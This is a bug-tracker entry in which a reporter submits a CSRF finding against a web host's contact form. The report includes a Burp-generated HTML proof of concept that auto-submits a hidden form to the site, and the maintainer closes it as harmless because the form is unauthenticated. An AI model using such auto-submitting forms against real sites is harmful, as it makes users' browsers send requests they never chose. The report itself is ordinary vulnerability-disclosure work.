- Status Closed
-
Assigned To
cbay - Private
Attached to Project: Security vulnerabilities
Opened by waloodi_109 - 04.09.2025
Last edited by cbay - 04.09.2025
Opened by waloodi_109 - 04.09.2025
Last edited by cbay - 04.09.2025
FS#208 - CSRF in Contact us
Hello Team,
CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.
CSRF HTML Code:
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://www.alwaysdata.com/en/contact/" method="POST">
<input type="hidden" name="address" value="************" />
<input type="hidden" name="name" value="janam" />
<input type="hidden" name="number" value="**************" />
<input type="hidden" name="slot" value="" />
<input type="hidden" name="message" value="hello" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState(', '', '/');
document.forms[0].submit();
</script>
</body>
There is a csrfmiddleware but when i was removing and sending the request to autenticated user its working and submitting the request.
Thank You,
Waleed Anwar
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task
Hello,
The contact form is unauthenticated anyway, so you would gain nothing from forcing someone else to submit it for you.
Kind regards,
Cyril